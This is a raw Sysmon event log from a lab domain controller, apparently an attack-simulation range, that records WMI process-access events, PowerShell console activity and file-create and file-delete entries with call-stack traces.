10341000x80000000000000002240643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.639{05ADC7E1-6DAB-603E-C1AA-00000000AD01}116009716C:\Windows\system32\conhost.exe{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x80000000000000002240639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.639{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_slldyl4f.h3s.ps12021-03-02 16:54:03.639 10341000x80000000000000002240638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240627Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E657773FEA196164A0EC16D6B1B6F6E8,SHA256=D4E9340983D221098BA71E1A8CFDD30A862155711E5397E90D82335E75DE147F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.607{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-C1AA-00000000AD01}11600C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.607{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 